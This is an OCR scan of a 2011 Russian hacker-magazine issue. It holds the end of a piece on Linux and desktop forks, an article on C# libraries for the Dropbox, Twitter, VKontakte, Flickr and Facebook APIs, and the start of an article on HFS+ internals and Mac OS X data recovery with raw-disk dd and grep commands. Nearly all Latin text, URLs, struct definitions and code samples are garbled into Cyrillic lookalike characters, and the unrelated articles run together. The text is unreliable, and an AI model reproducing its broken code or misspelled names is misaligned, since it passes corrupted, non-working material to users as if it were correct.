ным оформлением в зеленых тонах и несколькими собственными 
утилитами: 

» пип{Мепи — замена стандартного меню СМОМЕ; 

» ти Ип${а( — менеджер приложений, по функциональности 
схожий с Центром приложений в Убип{и; 

» ти Орда{е — менеджер для гибкой установки обновлений; 

® пи{ВасКир — очень простая тулза для бэкапов. 

В отличиеот ОС, ОЕ — одна изтех областей, где форки появляют- 
ся очень редко. Думаю, тут все дело в их большом разнообразии и 
трудоемкости поддержки. 

Но изредка такое случается. Один из самых свежих примеров — 
форк КОЕ 3.5. С выходом КОЕ4 разработчики КОЕ объявили эту 
ветку устаревшей и забросили. Нотак как не все были готовы рас- 
статься с 3.5, получился форк — ТгпЦКу ОезКор Епмгоптепе. 

Для проекта, заброшенного основной массой создателей, разра- 
ботка идет довольно бодро: выпущено несколько релизов с мел- 
кими улучшениями, имеются грандиозные планы по переписыва- 
нию на (14 и смене НАЁ на чдеу. На сайте (млм {гп Нуде®К{ор.ога) 
можно скачать пакеты для свежих Ое!ап/ОБип{и, ВРМ-пакеты 
для ВедНаЕедога и Ореп5Ц$Е ожидаются в ближайшем буду- 


щем. 


То ТогК ог пою ТогК 


Обычно форк приводит к «распылению» сил разработчиков. Но, 
бывает, что это единственный выход, и после этого проект обрета- 
ет вторую жизнь. 

Так случилось, например, сХ.Ога, который в 2004 году откололся 
отхЁгее86 из-за разногласий по поводу новой лицензии. 

В результате форк сейчас гораздо популярнее своего прародите- 
ля. Еще один удачный пример — ССС. В 1997 году был создан форк 
ЕСС, который включил в себя ряд экспериментальных возмож- 
ностей. Впоследствии проекты объединились, основой «нового 
ССС» стал ЕСС. = 
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покоряем Горох, УК, ЕКги Расебоок 


одним ударо 


© Твиттер, «В Контакте», ГасебоокК... Прочитал френд-ленты во всех 
сетях — и день прошел бездарно. Как быть? Как за всем уследить? 
Пожалуй, решение одно — автоматизация и фильтрация лишнего 
контента. Как это сделать? Как подружить свою программу с чужи- 
ми проектами? 06 этом и поговорим в статье. 


Что значит «взаимодействовать»? 


Изначально социальные сети строились как отдельные проекты. 0б 
объединении с похожими ресурсами не было и речи. Наверное, основной 
идеей был охват пользователей. «Зачем делиться посетителями, если их 
можно собрать всех”», — думали многие. К счастью, время делает свое 
дело, и после старта в России «В Контакте» стали появляется альтерна- 
тивы. Причем альтернативы схорошим финансированием — «Моймир», 
«Одноклассники» ит.д. В основе всех этих проектовлежитоднаитаже 
идея. Тем не менее, каждый из них старается выделиться и предоставить 
пользователю уникальные фишки. Вотбедным пользователям и прихо- 
дится разрываться. В одной сети — куча друзей, в другой — дофигалевого 
контента, втретьей — тусуются заказчики и работодатели... 

Выбрать для себя один сервис на все случаи жизни уже нереально. Раз- 
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работчики социальных сетей (атакже различных полезных сервисов) это 
поняли и сейчас активно улучшаютинтерфейсы для взаимодействия с 
другими сервисами и программами. Выгода очевидна для всех. Поль- 
зователю не нужно разрываться между разными проектами. С помощью 
специальных средств он может заходить в один сервис, но всегда быть в 
курсе того, что творится на другом. Воттебе реальный пример. На портале 
сообщества млллл/.уг-опИпе.ги настроена интеграция стакими социаль- 
ными сетями, как Т\/Щеги «В Контакте». Стоило один раз все поднять — и 
теперь при добавлении нового контента его анонс мгновенноулетает в 
твиттер и контакт. Вроде мелочь, а в итоге — пользователи обеих социаль- 
ных сетей сразу становятся в курсе обновления. Удобно?! Думаю, да. 
Честно говоря, это еще мелочи. Экспорт материала — этолишь вершина 
айсберга. Главная вкусность заключается в возможности использования 
системы авторизации социальных сетей для своего проекта. Проще всего 
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Рисунок 1. Регистрируем новое приложение в ОгорВох 
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Рисунок 2. Расебоок С# $0К на СодеРех 


АУТН АВТОРИЗАЦИЯ 


// Инициализация объекта типа ОгорВох.ОгорВохСгедепт{1а1$ 

// Объект используется для установки значений, используемых 

// для доступа к учетной записи ОгорВох 

ОгорВох .ОгорВохСгейдеп{1а1$ туСгедеп{1а1$ = пем АррЕ1ит1*. 
СЛоцаСотри 1пв .5ПагрВох.ОгорВох .ОгорВохСгедепе1а1$(); 


// Ключ, полученный при регистрации нового приложения 
туСгедеп*1а1$ .СопзитегКеу = "Кх$99117р114*су"; 

// Секретная фраза, полученная при регистрации 
туСгедеп*1а1$ .Сопзитег$есге{ = "Айм5а\у1гтхиб62ое"; 


// Вводим данные своего аккаунта 

// (имя пользователя и пароль) 
туСгедеп*1а1$.УзегМате = "апоп@5та11 . сот"; 
туСгедепт1а1$ .Ра$$мога = "13241414"; 


// Получаем стандартную конфигурацию хранилища ОР 
ОгорВох .ПгорВохСопйвига*1оп туСопявига*1оп = 
ОгорВох .ПОгорВохСопйвига*1оп .беЕ$ФапдаагаСопявига*1оп(); 


С1оца5Фогаёе ту5Фогаве = пем С1оца$Фогазе(); 


// Если открыть хранилище не удалось, 
// то прекращаем работу 
1+ (!пубфогаве .Ореп(туСопявига*1оп, туСгедеп*1а15)) 
{ 
М55Вох ("Не удалось открыть хранилище!"); 
гефигп; 


//Если все ок, то можем приступать к загрузке/выгрузке файлов 
ту$Еогаре . Ур] оа9Е11е ("аг{1с1е_Фог_х.х*", 
"/МуРиб11с01гес®огу"); 
тузфогаре .Бомп1оааЕ11е(" /МуРибагЕ1с1е_Фог_х.х® ", 
че 


// В конце необходимо проверить открытость 

// хранилища 

// Если оно открыто, то принудительно закрываем 
1+ (тузфогаве. Т5Орепеа) 


о 
пу5фогазе.С1о$е(); 


это представить на примере ммеб-проекта. Не буду далеко ходить и в каче- 
стве примера вновь назову свой любимый м/л/м/.уг-опИпе.ги. 

Однажды нам потребовалось привлечь новых посетителей. Привлекать 
решили из популярной социальной сети «В Контакте». Найти людей, 
которых может заинтересовать проект, не проблема. Гораздо труднее 
«сдвинуть» их с места и добиться того, чтобы они зарегистрировались 
на нашем ресурсе [ну и стали его посещать). Сегодня каждый второй 
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и$1п8 Тмееф5$Пагр; 
Тм1 Е ег5егу1се м5 = 
пем Тм1Фег5$ег\у1се("твой_ключ", "твой_секрет"); 


/ /Получаем ключ 
ОАчЕИВедие{ТокКеп гедТоКеп = 
м5 .беекедиеТокеп(); 


/ /Перенаправляем на иг1 оАи{П авторизации 
Цг1 чет = м5 .бееАцЕПог1та1опИУг1 (геадТокеп); 
Ргосе$$.5Фаг*(иг1.То5{г1п8()); 


/ /Обмен запрошенного ключа на ключ доступа 

${г1п8 уег1Нег = "123456"; //Указываем верификатор 
ОАчтПАссе$$ТоКеп ассе$$ = 

зег\1се.бееАссеТоКеп (гедие{Токеп, уег1вег); 


/ /Производим аутентификацию и получаем лист упоминаний 
зег\1се.АиЕПеп*1саейт ЕН (ассез$.Токеп, ассе$$. 
Токеп5есге{); 


ТЕпитега61е<Тм1 ег {афи$> тепЕ1оп$ = 
зег\1се.11${Тмее{$МепЕ1оп1п5Ме(); 


ресурстребует регистрации, и многие уже задолбались выдумывать 
себе разные логины и пароли. Наш ресурс в этом плане не отличается 
оригинальностью. Чтобы упростить дорогим посетителям жизнь, мы 
решили настроить взаимодействие сайта с социальной сетью «В Кон- 
такте» и обеспечить пользователям возможность входить на наш ресурс 
путем авторизации через контакт. Другими словами, для входа на наш 
сайт пользователю требуется авторизоваться во «В контакте» — и все. 
Результат не заставил себя долго ждать — новые пользователи стали 
охотно пользоваться этой фичей. Сейчасты можешь подумать, что по- 
добные взаимодействия актуальны лишь для сайтов, а для десктопных 
приложений действуют иные правила. Это нетак. Ты запросто можешь 
использовать подобные трюки и в десктопных приложениях. Допустим, 
ты решил закодить очередной и неповторимый [СО-клиент (Хотя, кто в 
наши дни еще пользуется аськой?). Однозначно ты получишь допол- 
нительных юзеров, если снабдишь свое творение поддержкой обмена 
сообщениями через «В Контакте», «ЕВ» ит.д. Сделаешь все это красиво 
и качественно — твоими пользователями станут не только асечники, но 
и контактники (как пример). Помни, что рост количества пользовате- 
лей твоего проекта существенно увеличивает шанс заработать на нем 
кругленькую сумму американских президентов. 

Во всех предыдущих абзацах ятолько и делал, что говорил о социаль- 
ных сетях. Однако, все вышеописанное можно также отнести и кдругим 
сервисам. На просторах интернета есть много интересных проектов, 
которые готовы предоставить доступ к своему функционалу. Тебелишь 
остается придумать, как этим можно воспользоваться и получить мак- 
симальную выгоду. Не нужно изобретать очередной велосипед — лучше 
взять готовую двухколесную хреновину и прикрутить к ней атомную тур- 
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Рисунок 3. 
Расебоок 
Оемеюрег ТооКЙ 


бину. Далее встатьея буду рассказывать не только о работе с соцсетями, 
но и сдругими полезными миеб-сервисами. 


Это можно делать по-разному 


Разработка приложений, направленных на взаимодействие с социаль- 
ными сетями, практически ничем не отличается от программирования 
других сетевых приложений. Втвоем распоряжении — бесконечный по- 
лигон возможных сценариев. Например, ты можешь блеснуть знаниями и 
быстренько все реализовать при помощи уже знакомых сокетов и метода 
научноготыка. То есть, берем анализаторы трафика и натравливаем ихна 
бродилку. Дальше смотрим, какие запросы отправляет браузер на сайт 
нужного сервиса и эмулируем все это дело втвоей программе. Способ, не- 
сомненно, надежный, но крайнетрудный для реализации. Одна отладка 
стадии работы с сокетами чеготолько стоит. Я уже молчу про бесконечные 
разборы полетов санализом запросов. 

К счастью, улюбой задачи есть несколько решений. И наша — не исклю- 
чение. Помнишь, я говорил, что разработчики подобных проектов стара- 
ются идти навстречу и для удобства предоставляютхорошо документиро- 
ванный АР!? Считай, тебе уже не нужно разбираться втонкостях протокола 
обмена информацией. Достаточно следовать официальному мануалуи 
почаще заглядывать в примеры. Этот способ уже лучше, чем предыдущий, 
но воздух все равно насыщен запахом отладки и бессонной ночи. Какой 
бы хорошей ни была документация, всегда найдется непредвиденная 
ситуация, которая существенно затормозит процесс разработки. 

Быть может, есть способ еще проще? Нуты и лентяй! Шучу-шучу, не мне 
тебя корить, я сам ленивый. Ктому же, более простой способ действитель- 
но есть. Не ты первый и неты последний программист, решивший напи- 
сать программу для работы с Х-сервисом. Этим вопросом озадачивались 
многие программисты, и самые матерые изнихуже давно выплеснули 
свой опытвуниверсальные библиотеки и модули. Такое добро реально 
найти практически для всех популярных языков программирования. Про- 
ще этого способа, пожалуй, нетничего. 


Вместительное файловое 
хранилище 


Уже два годая пользуюсьуслугами чудесного бесплатного сервиса — 
ОгорВох (ЧгорБох.согп). Если еще естьтанкисты, которые не слышали 
про ОгорВох, рассказываю. ОгорВох — это сервис, позволяющий поднять 
синхронизацию файлов между всеми своими компьютерами. Твои файлы 
хранятся на серверах ОгорВох и автоматически копируются на компью- 
теры, участвующие в синхронизации. Получается некий файлообменник. 
Только в отличие отальтернативных проектов, ОгорВох предоставляет 
достаточно шикарную бесплатную версию. Суди сам, тебе дают2 Гб 
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места под файлы и полнофункциональную версию клиента. Что?! Мало 
места? Да, сегодня объемы нужной информации зашкаливают, поэтому 
двух гигабайт может и не хватить, но это не означает, что ОгорВохтебе 

не подойдет. Ты можешь по дешевке взять платныйтариф или немного 
прокачать свой бесплатный аккаунт. Разработчики регулярно проводят 
всякие конкурсы и мероприятия, позволяющие без особых затруднений 
поднять дополнительное место. Например, яуже прокачал свою учетку 
до пяти гигабайт. Ладно, вернемся кнашим баранам. Я уже сказал, что 
ОгорВох — замечательный сервис, грех не воспользоваться им в своих 
личных целях. К счастью, разработчики уже давно открыли АР!, аэнту- 
зиасты даже выпустили свои варианты классов и библиотек. Поскольку 
мы ориентируемся на С#, то нашим выбором станетнадстройка 5ВагрВох 
(5Рагрбох.содер(ех.согп). Это бесплатный набор классов, позволяющий 
эффективно использовать функции ОгорВох из своего приложения. 
Проектактивно развивается и наданный моментуже может похвастаться 
полной поддержкой всех функций ОгорВох. Одно время при использова- 
нии библиотеки возникали проблемы, но версия отЗ1 декабря 2010 года 
исправила эту досадную ситуацию. Я не буду расписывать примеры от 
начала до конца, абуду приводитьлишьнебольшие интересные отрывки. 
Дописать ихты всегда сможешь, воспользовавшись документацией и 
демками, идущими в комплекте. Передтем как приступить к созданию 
своего первого приложения, взаимодействующего с ОгорВох, тебе необ- 
ходимо обзавестись аккаунтом на этом сервисе и зарегистрировать новое 
приложение вличном кабинете (ВИ р5://Лллллм. дгорбох.сого/Чемеорегэ/ 
аррз}. После регистрации нового аррИсаНоп ты получишь АррКеуи 
АррФесге{. Этоуникальные ключи, без нихтвое приложение никогда не 
заработает. Итак, кактолько создашь новое приложение, можешь попро- 
бовать запустить У$, подключитькней 5ВагрВох и накидать небольшой 
примерчик, демонстрирующий возможности библиотеки. Код моеготако- 
го приложения приведен во врезке «Знакомимся с ОгорВох» и снабжен 
обильными комментариями. В своем примерея демонстрирую загрузку 

и закачку файла с сервера ОгорВох. Остальные операции выполняются 
аналогичным образом. Подробности смотри в официальных примерах 
(см. ссылки во врезке). 


Сишарпная щебеталка 


«Онслишком прост, чтобы в нем долго копаться» ©. Это высказывание 
можно смело отнести копопсевшему сегодня сервису микроблогинга — 
Тмм(ег Реально, заморские перцы из, казалось бы, банального проекта 
сделали сервис, который завоевал мир. Сначала в нем были лишьгики, 
затем пришли домохозяйки. Еще позже в скворечник заджойнились 
знаменитости, и самыми последними подтянулись чиновники. Не уметь 
программировать приложения для работы с данным сервисом — верх 
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ЧИТАЕМ ТВИТ-ЛЕНТУ 


ССЫЛКИ ПО ТЕМЕ 


и$1п8 Тмееф$Пагр; 

// Создаем объект типа Тм1ег5$егу1се 

// при помощи данного объекта мы будем читать 

// тайм-ленту 

Тм1 Еег5егу1се муТи1ег5егу1се = пем Тм1ег$егу1се(); 


ТЕпитега61е<Ти1{{ег5{афи$> Фмееф$ = 
туТм1 Е ег5егу1се . 115{Тмее{$ОпРиб11сТ1те11пте(); 


/ /Перебираем всю ленту и выводим. В консоль/форму 
фогеасй (маг меет 1п мее\5) 
{ 
Соп5о1е.\г1еЕ1пте("{0} — "{1}"", 
фмее*.Ц5ег.5сгеепМате, Емееф.Тех*); 


кощунства. Сишарп-разработчикам как всегда повезло чуточку больше, 
чем другим. Уже больше года развивается одна излучших клиентских 
библиотек для взаимодействия ствитгером — ТмиЦегВагр. Среди по- 
добных проектов этотвыделяется в первую очередьтем, что прекрасно 
подходиткак для .МЕТ [2-4], Мопо 2.6, таки для новомодного пом 
РВопе 7. Поддержка работы под \/\/Р'7 — одна изглавных вкусностей. Эта 
ОС вышла совсем недавно, приложений под нее почти нет. Утебяеще 
есть все шансы создать неповторимый Тм/Кег-клиенти завоевать любовь 
пользователей. Где найти лучшее применение библиотеке ГммЦег-5Вагр 
— ты решишь сам, ая продемонстрирую, каксее помощью авторизовать- 
сявчирикалке, используя ОАШЬ, и получить список сообщений своей 
ленты. Мой код ты найдешь во врезках с говорящими названиями. Все 
необходимые пояснения я, как обычно, привел в комментариях. Полное 
описание классов смотри в... исходниках. Увы, пока хорошей документа- 
циикбиблиотеке нет. 


«В контакте» 
под чутким надзором 


«В Контакте» — пожалуй, самая популярная в России социальная сеть. 
Одни используютее для бесконечного трепа с друзьями, а другие, более 
продвинутые, — какплощадку для продажи или рекламы своихтова- 

ров иуслуг. Крометого, «В Контакте» может похвастаться несметным 
количество не совсем легального медийного контента. Несмотря на 
популярность, в плане кодинга контактвыглядиточеньтухло. За все 
время существования этой сетитак и не появилось качественного 50К и 
качественной библиотеки для взаимодействия сторонних приложений 

с функциями социальной сети. Нет, нельзя сказать, что энтузиасты не 
предпринимали попыток создать шедевр. Попыток были, но практически 
все проекты не могут выйти из стадии АЧа, либо стали заброшенными. Из 
того, что есть, наиболее выгодно выделяется проект мега УКогаЖе 
АР! ($ мега уКар!.содер(ех.соп?). Его возможностей вполне хватит для 
решениятиповых задач (публикация на стену, загрузка фотографий ит.д.). 
Примеры объемны для публикации, смотри исходники на диске. 


Дружим с ЕКг 


РИскгнеявляется социальной сетью, это просто сервис для хранения 


фотографий и видеороликов, созданный компанией Уароо. Проектимеет 
как платную, так и бесплатную версии. У последней есть ряд досадных 
ограничений, но это не помешало фликру завоевать популярность среди 
блогеров. Если верить данным из\А\ЛК!редта, то на конец сентября про- 
шлого года база фликра содержала около пяти миллиардов изображений. 
В отличие отнеудобного в плане программирования «В Контакте», для 
работы с фликром на СодеР[ех'е есть библиотека ЕИскгГМЕТ АРИБгагу 
(скгое.содер(ех.соп?). После подключения ее ксвоему проекту, работа 


сЕсКг ом сведется к вызову нескольких методов. Примеры опять же не 
привожу, они ждуттебя на О\О. 
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® овагрбох.содер(ех. сот/4оситеп{аНоп — исходники при- 
меров, демонстрирующие взаимодействие с ОгорВох при 


помощи библиотеки 5ВагрВох. 

® эПагрбох.содер(ех.сот — здесь хостится библиотека 
ОгорВох. 

® [мее(5Пагр.содер[ех. сот — месторасположение библиотеки 
{мее(Вагр. 

® пог(иг[сгеатог.содер(ех.сот — сервисы сокращалок 
ссылок сегодня очень популярны. Хочешь создать удобную 
программу для работы с ними? Тебе непременно нужно озна- 
комиться с этим примером. 

® 5\уар!.содер(ех. сот — 5 мег[и9Н{ АР! Соппес{юог для «В Кон- 
такте». 


® саЦгапз(а{е. содер(ех.сот — пример взаимодействия с сер- 
висом переводов от бооц(е. 


® укоп(ак(е.ги/Чемеюорегз.рбр — официальная информация 
для разработчиков приложений для «В Контакте». 


® ммм. уг-опИпе.ги/раде/мг-опИпе-декабг-уапуаг-3171 — в 
этом номере бесплатного журнала для программистов \УБК- 
ОпИпе есть статья, рассказывающая про взаимодействие с 
сервисом перевода от боод(е без использования сторонних 
библиотек. Рекомендую ознакомиться. 


Рулим Еасебоок 


Гасебоок — сеть малоизвестная, иты наверняка о ней ничего не 
слышал :]. Возможно, тебе захочется с ней познакомиться только 
потому, что в ней отвисает почти вся команда Хакера. В отличие от«В 
Контакте», для ГасебооК’а существует множество вариантов $ОК, мо- 
дулей ит.д. Стоитзайти натотже Соде[Р{ех, вбить в поиск «ГЕасероок» 
— иперед тобой вывалится несколько страниц с разными модулями/ 
библиотеками. Среди такого количества вариантов нетрудно и по- 
теряться. Особенно напрягает, что многие предложенные решения в 
настоящий моментуже не работают. Чтобы ты не тратил свое драгоцен- 
ное время зря, я сразу рекомендую тебе присмотреться к библиотеке 
Гасебоок С# $О0К [(асебоок$ЧкК.содер(ех.сот] и Еасебоок Оеуеорег 
Тооки (асебоокоо({К.содер(ех. согп]. С их помощьюты за считанные 
минуты научишься создавать десктопныеЛме/5ЦуегИаК\-приложения, 


взаимодействующие с Гасероок. Добавь ко всему этому возможность 
работы под \\ЛпЧом/з РПопе 7, и становится однозначно понятно, что 
обе библиотеки ппиз{ Па\уе! 

Обе библиотеки хороши, но я больше предпочитаю использовать вто- 
рую. Почему? Нет, я не имею ничего против Гасебоок СЯ ОК, нос РОТ 
я познакомился немного раньше и успел привыкнуть кней. Для того 
чтобы начать разработку своего первого проекта для Гасероок, тебе 
потребуется пройти на ммлм.Еасебоок.сог/#/Чеуеюрего/ и создать 
новый аррИсайоп. Подобную процедуру ты выполнял при разработке 
приложения для ОгорВох. Выполнив эту нехитрую операцию, ты по- 
лучишь ключ, который и будешь использовать в проекте. Ну а дальше 
все стандартно. Имея на руках ключ приложения и Е0Т, ты можешь 
приступать к разработке своих программ. В ЕОТ есть все необходимое 
для организации поиска друзей, отправки сообщений ит.д. Длинных 
примеров кода приводить не стану. Где их найти — сам знаешь. 


Заключение 


На этом я хочу закончить статью и пожелатьтебе оставаться все время 
втеме. Смотри, что сделали разработчики, качай 50К и пробуй по- 
казать пользователям уже готовые идеи с другой стороны. Помни, что 
пользователи согласны платить не только за абсолютно новые фишки, 
но и красивые обертки для давно существующих. Прояви фантазию и 
будьуверен, чтотвои работы будут замечены. На этом разреши попро- 
щаться. Увидимся в будущем! == 
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О ТКАПЫВАЕМ 
ЯБЛОЛАННЫЕ 


Изучаем восстановление данных в Мас 05 Х 


ОВ это трудно поверить, но так называемые «непродвинутые» 
пользователи иногда удаляют важные данные и потом громко о них 
сожалеют. Расхлебывать их проблемы приходится программистам, 
поэтому сейчас мы разберемся в том, как Мас 05 Х хранит данные 
на носителях, и как эти данные можно восстановить. 


ито 5 НЕ 

Для использования в Мас 05, Арр[е разработала свою собствен- Длина имени файла ЭТ 255 

ную файловую систему НЕЗ [Н!егагс са! ЕЦе бу${ег]. В настоящее Кодировка имен файлов Мас Комап Ип1соае 
времяей на смену пришла НЕ$+, которая используется в Мас 05, Нода каталога 512 байт 4 Кбайт 
начиная с версии 8.1. Структура тома, использующего НЕб+, близка Максимальный размер файла 2^31 2^63 

к НЕЗ, но вто же время содержит некоторые отличия. Основные 

характеристики этих двух систем: Как видишь, НЕ$+ была создана, чтобы наиболее эффективно ис- 


й 102 ХАКЕР 07 /150/ 2011 


Резаг/ед (1024 5) 


Структура НЕ$+ 


АЛосаНоп гИе 


о томе — втом числе и о размещении других служебных структур 
НЕ$+ на диске. Так, например, |очгпа/птоВоск — размеще- 

ние журнала, если для этой системы ведется журналирование 
аЦосайопЕЦе-блок, с которого начинается карта размещения 
файлов на диске, са{аюдЕЦе — размещение файла каталога. 


ЕЖегз Очеоми РНе 


Заголовок тома НЕ 5+ 
5ЕгисЕ НЕЗР1Ти$\/о1итеНеааег 


{ 
ЕИе аа ИТпе16 51впакиге; 
От . 0Ти*16 уег$51оп; 
Егее Зрасе № ОТп32 аег1Би{те$; | 
ИИ 52 ]1а5{Моипфеа\ег$1оп; 
ее ]очгпа1ТифоВ1оск; 
УТИЕ 2 сгеафепа*е; 
ОТив 52 то91Фуба*е; 
Ти 32 БаскКирВате; 
ИТИЕЗ2 спескеара*е; 
ЭЧапир Ее ШЛИ З2 #1еСоип*; 
ИТ За Ффо1аегСоип*; 
Шиа 61оск$17е; 
ОТВЕЗ 2 Тофа1В1осК$; 
Пти За гееВ1осК$; 
ИЕ 2 пех А11оса*1оп; 
ОТИЕ32 г5гсС1итр517е; 
АПетае Уоите Неадег р - ВОТЬ: 
НЕ5Сафа]1оМодеТр —пех%Сафа1о=Тр; 
Ти 32 : мг1еСоип*; ры 
0Ти*64 епсоа1п5$5В1%тар; 
0Тпй*32 бидегТи+о[8]; 
пользовать дисковое пространство для томов больших размеров и НЕЗР1изЕогКБа*а а11оса+1опЕ11е; 
фрагментированных файлов. НЕЗР1и5$РогКкбафа — ех®епф$Е11е; 
НЕЗР1и5РогК,ата сафа1о>=Е11е; 
НЕЗ+ внутри НЕЗР1иРогКра*а а г1би{е$Е11е; 
НЕЗ делит дисковое пространство на блоки одинакового размера. НЕЗР1и$РогКба*а $фаг%ирЕ11е; 
Для идентификации блока используется 16 бит, стало быть, всего те 


может быть 65536 таких блоков, при этом каждый блок занимает 
целое число секторов. Очевидно, что такая система приводит к 
потере большого пространства на больших томах. 

В свою очередь НЕ$+ использует 32 бита для нумерации блоков, 
что позволяет использовать пространство более рационально 
Для управления размещением данных на диске НЕ$+ хранит на 
нем также и служебную информацию — метаданные. Среди них 
наиболее важны для работы файловой системы и наиболее инте- 
ресны нам в деле поиска пропавших данных: 

® \/Уоите Веадег (заголовоктома]. Содержит общую информацию 
о томе. Например, размер блока данных и информацию о располо- 
жении других блоков метаданных на диске. 

® АЦосаНоп Н(е [файл размещения или карта тома]. Ви тар, в 
котором отмечен статус каждого блока на диске. [1 — занят, 0 — 
свободен.) 

® Са{а[од Н(е [каталог]. В нем хранится большая часть данныхо 
размещении файлов и папок на диске. 

® Ех{еп{5 оуег[ом/ [е. Содержит метаданные, которые не разме- 
стились в каталоге. 

® АНирщез Не [файл атрибутов]. Используются для контроля до- 
ступа ит.п. 

® /оцгпа[ е (журнал). Хранит данные о транзакциях, выполнен- 


Запись сайа\од Ще 

$ЕгисЕ НЕ$Р1ч$Сафа1о=Е11е 

{ 
$11116 гесогаТуре; 
УТи{16 Ная5$; 
ИТи{32 гезегуед1; 
НЕ5Сафа1о=Моаетр Я1етр; 
УТп{32 сгеафера{е; 
ИТп{32 сопфепЕМоа)а*е; 
0Тп{32 аЕ%г1БифеМодра*е; 
0Ти{32 ассе$$Ба*е; 
ИТп{32 БаскиррВа*е; 
НЕ$Р1и5Регт1$$1оп$ регт1$$10п$; 
ЕТи+о изегТи+о; 
ЕХТифо ЯпаегТито; 
0Тп{32 ехЕЕпсоа1пв; УТп{32 гезегуеа2; 
НЕЗР1иРогкрафа ЧафаЕогк; 
НЕЗР1иРогкОафа гезоигсеРогК; 


р 


Са{а[од Ше содержит метаданные файлов и папок в виде отдельных 
записей. Моде |0 (СМ!О] — это уникальный номер ноды файловой 
системы. Самая важная информация в записи са{а|о9 {е’а — это 
данные о размещении файла, в которые входят 

восемь записей из стартового блока и длины в блоках непрерывной 


ных для данного тома. 
Са{а(1од Ще, е{еп{$ оуегЦом/ {е иаИгбще Н[е — представляют 
собой В-деревья. 

Заголовоктома всегда размещается по фиксированному смеще- 
нию 1024 байта от начала тома. Он содержит общую информацию 


> 103 


ХАКЕР 07 /150/ 2011 


1 
о 


я 


СООМ6 
| 


с 


Ва |. 


Буи” ие ГИЯ 
А а 


И 


части фрагмента файла (ЮгК'а]. Если этого недостаточно, осталь- 
ные данные о форках файла есть в ЕЖжеп{ омегЦоми [е. 


Запись ГогК-а файла 
$ЕгисЕ НЕЗР1и$РогКВа*а 
{ 
0Тп{64 1051са1$17е; 
УТи{32 с1итр$17е; 
ИТвЕ32 соБа1ВТоск5: 
НЕЗР1и5Ехфеп*Кесога ехфепф5; 


тр: 


Журнал НЕ5+ — это непрерывный набор блоков транзакций, кото- 


рый никогда не перемещается и его размер не изменяется. Иначе 
говоря, он представляет собой циклический буфер фиксирован- 
ного размера, который содержит записи транзакций НЕ$+. На 
одну транзакцию может быть выделен один или несколько списков 
блоков операций. Список состоит из заголовка списка, за которым 
следуют собственно данные. На этом, пожалуй, мы закончим скуч- 
ное знакомство с внутренностями НЕ$+, поскольку ничего секрет- 
ного тут нет — это открытый формати более подробное описание 
ты можешь найти на официальном сайте Арр(е. 


Низкоуровневый оступкФСи 
восстановление данных 


По восстановлению информации в Мас05 НЕЗ и НЕ$+ написано 
гораздо меньше мануалов, чем для других систем, да и выполнить 
это восстановление сложнее. Трудности появляются из-за того, 
что НЕ5+ используются В-деревья для хранения метаданных 

о размещении файлов. После того как какой-то файл удален, 
В-дерево тут же обновляется, и информация о размещении уда- 
ленного файлатеряется. С выпуском Мас ОЗ Х 10.2 в августе 2002 
года Арр(е усовершенствовала НЕ5+, добавив журнал, который 
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хранит все изменения файловой системы в блоках транзакций. 
Журналирование может быть разрешено или запрещено пользо- 
вателем в процессе работы. В Мас О5 Х версии 10.2 по умолчанию 
журналирование запрещено. В Мас ОХ 10.3 и более поздних оно 
по умолчанию разрешено. То есть, на всей современной технике 

с Мас О5Х изменения файловой системы журналируются. Однако 
журнал был добавлен в НЕ$+ не для восстановления утраченных 
данных, а для поддержания целостности ФС в случае исключи- 
тельных ситуаций. Простое действие пользователя порождает 
множество изменений в файловой системе. Так, при создании 
файла, например, происходит следующее: 

» В Сатаю9 И(е добавляется нода нового файла. 

» ВЦгтпар тома изменяется, чтобы корректно отразить информацию 
о занятых блоках. 

® Гакже записи будут добавлены в Ежеп{ оуег ом,, если файл силь- 
но фрагментирован. 

® Файл атрибутов обновляется. 

® Заголовок тома обновляется, чтобы зафиксировать факт измене- 
ния файловой системы. 

Все эти изменения могут привести к тому, что файловая система 
будет повреждена, поскольку в процессе этих действий может 


произойти отключение питания или извлечение съемного носите- 
ля. Журналирование как раз и помогает решить эту проблему. 
Транзакция в журналируемой НЕ$+- включает следующие шаги: 
1. Начать транзакцию копированием всех предполагаемых из- 
менений в файл журнала. 

2. Записать журнал из буфера на диск. 

3. Записать факт транзакции в заголовок журнала. 

4. Провести запланированные изменения. 

5. Пометить транзакцию завершенной. 

При монтировании файловой системы НЕ$-+- система проверяет 
журнал на предмет незавершенных транзакций. Если таковые 
есть, то файловая система будет исправлена. 
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Наконец-то восстанавливаем 
данные! 


Как же использовать журнал для восстановления поврежденных 
файлов? Необходимо выполнить следующие действия: 

1. Читаем заголовок тома 

2. Получаем доступ к Са{а([од ЕЦе 

3. Находим размемещение файла журнала 

4. Читаем его в память 

5. Находим там записи об удаленных файлах 

6. Если блоки, принадлежащие удаленным файлам еще не пере- 
записаны [проверяем по ВИпар)}, читаем их и восстанавливаем 
данные. 

Здесь вроде бы все понятно, но есть одна проблема — размер 
журнала ограничен и периодически его содержимое перекрывает- 
ся. Журнал загрузочного тома Мас-пипгобычно перекрывается за 
5-10 минут. Журнал загрузочного тома МасВооК'а перекрывается 
за 30 минут. Если на томе работает Тите МасПте, то журнал пере- 
крывается каждые 20 секунд. В общем, перезапись идет довольно 
активно. Поэтому перед восстановлением том лучше смонтировать 
только для чтения: 


шкКа1г /\/о1ите$ /Му\/о1ите 
тоцпЕ -* ИР -г /деу/а1$КХХХХ /\Мо1ите$ /Му\о1Тите 


Так мы сохраним журнал и ктому же предотвратим перезапись 
блоков удаленных файлов, которые помечены в БЦ тар`е тома как 
свободные. 

По принципу анализа журнала НЕ$+ работает множество софтин, 
которыеты легко можешь найти в Сети, и большого смысла писать 
под это дело свою — нет. 

Посмотрим, что можно сделать руками в консоли. Хорошо разо- 
бравшись в структуре НЕЗ+-, ты сможешь, используя стандартную 
утилиту «А9», которая позволяет дампить участки диска в файл, 
анализировать журнал и карту тома в консоли. Хотя это, конечно, 
очень утомительно :]. 

Вот пример чтения одного блока по заданному адресу: 


сидо Аа 1+=/аеу/41$К1 о+=. /еу1аептсе $=4996 \ 
$К1р=4355500 соипт=1 


Если есть какие-то предположения о содержимом файлаи, тем 
более, если это текстовый файл, можно проделать такой трюк: 


зи4о саф /4еу/а1$К1 | $&г1пв$ -о | вгер -1 \ 
'зесгеф соае' -сС 5 

Если блоки удаленного файла еще не были перезаписаны, то этот 

способ позволит полностью восстановить файл. 

Даже если блоки файла перезаписаны, например, с использова- 

нием специальных утилит, аналогичных $Вгей, данные файла могут 

еще остаться в виртуальной памяти — то есть, в файле подкачки. В 

Мас 05 Х файл подкачки хранится в /маг/\гл 


